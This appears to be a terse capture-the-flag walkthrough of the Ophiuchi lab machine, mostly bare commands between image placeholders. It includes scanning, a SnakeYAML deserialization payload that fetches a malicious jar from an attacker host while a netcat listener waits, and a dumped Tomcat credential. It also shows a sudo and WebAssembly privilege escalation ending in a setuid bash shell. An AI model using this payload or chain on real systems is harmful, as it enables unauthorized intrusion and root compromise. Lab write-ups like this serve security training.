nmap -A -p- -oA ophiuchi 10.129.152.152 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA ophiuchi 10.129.152.152

nmap -sU -O -p- -oA ophiuchi-udp 10.129.152.152

nikto -h 10.129.152.152:80

Pasted image 20220205085625.png

Pasted image 20220205085727.png

whatweb http://10.129.152.152

Pasted image 20220205085854.png

http://10.129.152.152:8080

Pasted image 20220205085921.png

git clone https://github.com/artsploit/yaml-payload

Pasted image 20220205090528.png

tree -fs

Pasted image 20220205090616.png

nmap -p8080 10.129.152.152 --script http-enum -oN webScan

http://10.129.152.152:8080/manager

Pasted image 20220205090718.png

cat src/artsploit/AwesomeScriptEngineFactory.java

Pasted image 20220205091012.png

javac src/artsploit/AwesomeScriptEngineFactory.java

jar -cvf yaml-payload.jar -C src/ .

Pasted image 20220205091158.png

python3 -m http.server 80

nc -lvnp 443

!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://10.10.14.20/yaml-payload.jar"] ]] ]

Pasted image 20220205091817.png

cat /opt/tomcat/conf/tomcat-users.xml

Credenciales-> admin:whythereisalimit

Pasted image 20220205092344.png

su admin

Pasted image 20220205092459.png

sudo -l

Pasted image 20220205092524.png

cd /tmp

ls -l /opt/wasm-functions

cat /opt/wasm-functions/index.go

Pasted image 20220205092859.png

cp /opt/wasm-functions/main.wasm .

touch deploy.sh

ls -l /bin/bash

vim deploy.sh

sudo /usr/bin/go run /opt/wasm-functions/index.go

Pasted image 20220205093334.png

git clone --recursive https://github.com/WebAssembly/wabt

Pasted image 20220205093842.png

cd wabt

git submodule update --init

mkdir build

cmake ..

Pasted image 20220205093955.png

cmake --build .

Pasted image 20220205094106.png

python3 -m http.server 8082

wget http://10.129.152.152:8082/main.wasm

Pasted image 20220205094518.png

./wasm2wat ../../main.wasm

./wasm2wat ../../main.wasm > main.wat

cat main.wat

Pasted image 20220205095026.png

rm main.wasm

./wat2wasm main.wat > main.wasm

Pasted image 20220205095358.png

python3 -m http.server 80

cd tmp

wget http://10.10.14.26/main.wasm

Pasted image 20220205095417.png

chmod +x main.wasm

ls -l /bin/bash

cat deploy.sh

ls -l /bin/bash

bash -p

Pasted image 20220205095739.png

boxes

copyright©2022 Cu3rv0x all rights reserved